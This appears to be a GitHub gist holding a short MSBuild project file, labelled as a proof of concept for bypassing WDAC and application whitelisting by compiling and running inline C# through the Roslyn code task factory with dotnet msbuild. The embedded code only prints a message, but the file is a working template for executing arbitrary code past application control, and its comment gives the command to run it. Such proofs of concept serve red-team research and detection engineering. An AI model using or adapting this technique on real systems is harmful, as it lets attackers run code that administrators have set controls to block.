This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- dotnet.exe msbuild rosylyn_poc.csproj --> | |
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Rosyln Compiler --> | |
<Project DefaultTargets="Build"> | |
<UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll"> | |
<Task> | |
<Code Type="Fragment" Language="cs"> | |
<![CDATA[Console.WriteLine($":-) CSHARP :-)");]]> | |
</Code> | |
</Task> | |
</UsingTask> | |
<Target Name="Build"> | |
<HelloWorld /> | |
</Target> | |
</Project> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment